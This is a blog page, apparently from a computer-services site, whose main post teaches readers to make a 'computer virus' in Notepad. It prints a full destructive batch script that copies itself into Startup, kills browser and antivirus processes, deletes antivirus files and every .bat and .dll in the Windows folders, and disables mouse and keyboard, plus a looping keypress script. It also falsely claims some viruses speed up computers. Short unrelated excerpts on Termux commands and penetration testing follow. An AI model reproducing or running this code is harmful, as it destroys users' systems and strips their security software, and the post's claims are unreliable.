System Security | Repairs | Computer Training | Ethical Hacking | Networking | Sales of Computers and accessories
Search This Blog
How to write a Computer Virus Program
Computer Virus is simply a program written by programmer to fight against the computer system.
Sometimes some computer virus help to boost the speed of your computer.
1. How to make a virus with notepad To write your first computer virus program copy this code below and past on Note pad.
@echo off
copy “virus.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup”
copy “virus.bat” “C:”
copy “virus.bat” “%userprofile%My Documents”
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:Program FilesCommon FilesSymantec Sharedccapp.exe
cd C:WINDOWS
if exist “*.bat” del “*.bat”
cd C:WINDOWSsystem32
rem made with Batch Virus Maker V.2
if exist “*.dll” del “*.dll”
tskill McAfee Security Centre Module
del c:program filesmcafee.comagentmcdetect.exe
rem made with Batch Virus Maker V.2
copy “virus.bat” “virus.bat45544”
copy “virus.bat” “virus.bat85858”
copy “virus.bat” “virus.bat1645”
copy “virus.bat” “virus.bat574457”
copy “virus.bat” “virus.bat55457”
copy “virus.bat” “virus.bat9765”
copy “virus.bat” “virus.bat45465”
rem made with Batch Virus Maker V.2
copy “virus.bat” “virus.bat456877”
copy “virus.bat” “virus.bat77989845”
copy “virus.bat” “virus.bat2135”
copy “virus.bat” “virus.bat46876”
rem made with Batch Virus Maker V.2
copy “virus.bat” “virus.bat45687”
copy “virus.bat” “virus.bat8868”
copy “virus.bat” “virus.bat2000”
copy “virus.bat” “virus.bat2009”
msg * this is a virus
rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable
Save it as “virus.bat” or anything with the name you want to. Now your first virus is ready to work. You can also convert it as .exe file. It copies itself to startup, hard disk, my documents and then it kills explorer.exe, chrome.exe and firefox.exe. It tries to delete mcafee antivirus and tries to delete every .dll and .bat files. Now if someone clicks on the .bat or .exe file this batch file will run and execute the operations written in the code. So beware of running this batch file or you may need for a restoration on your computer.
2. Endless Enter (Damaging Code)
This will make the enter button pressed continuously
Open Notepad and Paste the following code into it and save it as repeater.bat or anything *.bat
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Turmux is an android terminal emulator that enables command line interface, just like command prompt , it works directly with no rooting or setup required Basic Command Codes and Their Functions cp -v This is used to prints informative massage cp -r This is used to copy any directory mv -u This is used to update-move when source is newer than destination mv -v This is used to move any directory ls -n This is used to display UID and GID directory ls --version This is used to check the version of ls command cd -- This is used to show last working directory from where we moved ls -l This is used to show file action like - modified, date and time, owner of file, permissions Etc. ls help This is used to show display how to use "ls" command cp -n no file overwrite cd ~ This is used to move to users home directory from anywhere mv [file1 name] [new file2 name] This is used to move or rename two file at a time cd - This is used to move one directory back from...
INTRODUCTION : What is Hacking? Hacking of computerized electronic machines and networks is considered as the biggest national threat by the security services and the intelligence agencies of many countries. Hacking was once considered as a harmless activity to improve an existing computerized machine by identifying its strength and weakness. But now hacking is more or less of a crime than any other. In some countries hacking is considered on the same level as terrorism. It is condemned large by the world governments. Types of Hacking 1. White Hat Hacking ( Ethical Hacking) 2. Black Hat Hacking ( Crackers) Ethical hacking : An Ethical hacking is a process of building , fortifying, securing a computerized machine and networks by knowing its strength and weakness . To do that, the ethical hacker must get into the mindset of whoever is trying to break into their system. They will thoroughly check their system for weaknesses, and figure out how they...
Penetration test, which is also known as pentest, is an authorized simulated cyberattack on a computer system, which is aimed at evaluating the security of the system. The test is performed to identify both weaknesses (also referred to as vulnerabilities), including the potential for unauthorized parties to gain access to the system's features and data, as well as strengths,enabling a full risk assessment to be completed. Types of Web Penetration Testing Web applications can be penetration tested in 2 ways. Tests can be designed to simulate an inside or an outside attack. 1) Internal Penetration Testing – As the name suggests, the internal pen testing is done within the organization over the LAN, hence it includes testing web applications hosted on the intranet. This helps in finding out if there could be vulnerabilities which exist within the corporate firewall. We always believe attacks can happen only externally and many a time’s internal Pentest is overloo...